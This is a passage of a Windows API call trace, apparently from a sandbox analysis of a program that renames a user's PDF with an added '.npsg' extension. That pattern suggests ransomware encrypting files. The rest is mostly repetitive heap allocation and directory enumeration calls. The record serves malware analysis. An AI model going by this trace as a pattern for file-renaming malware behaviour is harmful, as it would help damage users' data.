(lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\IsKKH1qGBDUE_t.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\iskkh1qgbdue_t.pdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\IsKKH1qGBDUE_t.pdf.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\iskkh1qgbdue_t.pdf.npsg")) returned 1 [0240.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89cd0 | out: hHeap=0x620000) returned 1 [0240.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0240.746] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0240.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x708b30 | out: hHeap=0x620000) returned 1 [0240.748] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a7731c0, ftCreationTime.dwHighDateTime=0x1d5bb4e, ftLastAccessTime.dwLowDateTime=0xedbdb690, ftLastAccessTime.dwHighDateTime=0x1d5b5bc, ftLastWriteTime.dwLowDateTime=0xedbdb690, ftLastWriteTime.dwHighDateTime=0x1d5b5bc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ma0LRjiKCyKK4", cAlternateFileName="MA0LRJ~1")) returned 1 [0240.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393c58 [0240.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0240.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x16c) returned 0x3b83e60 [0240.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e5f8 [0240.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8da60 [0240.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393dc8 [0240.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393d10 [0240.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ff0 [0240.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x33940a8 [0240.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a110 [0240.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64ea20 [0240.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64ed18 [0240.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e858 | out: hHeap=0x620000) returned 1 [0240.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d7c0 | out: hHeap=0x620000) returned 1 [0240.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393a30 | out: hHeap=0x620000) returned 1 [0240.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ae8 | out: hHeap=0x620000) returned 1 [0240.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393e80 | out: hHeap=0x620000) returned 1 [0240.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393f38 | out: hHeap=0x620000) returned 1 [0240.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a3b8 | out: hHeap=0x620000) returned 1 [0240.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0240.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393f38 [0240.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0240.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393c58 | out: hHeap=0x620000) returned 1 [0240.749] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a7731c0, ftCreationTime.dwHighDateTime=0x1d5bb4e, ftLastAccessTime.dwLowDateTime=0xedbdb690, ftLastAccessTime.dwHighDateTime=0x1d5b5bc, ftLastWriteTime.dwLowDateTime=0xedbdb690, ftLastWriteTime.dwHighDateTime=0x1d5b5bc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ma0LRjiKCyKK4", cAlternateFileName="MA0LRJ~1")) returned 0 [0240.749] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0240.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0240.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e7c0 | out: hHeap=0x620000) returned 1 [0240.749] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0240.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e7c0 [0240.749] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0240.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0240.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0240.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0240.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0240.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0240.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0240.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0240.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0240.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0240.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0240.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0240.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0240.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0240.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0240.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0240.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0240.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0240.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0240.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0240.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0240.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0240.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 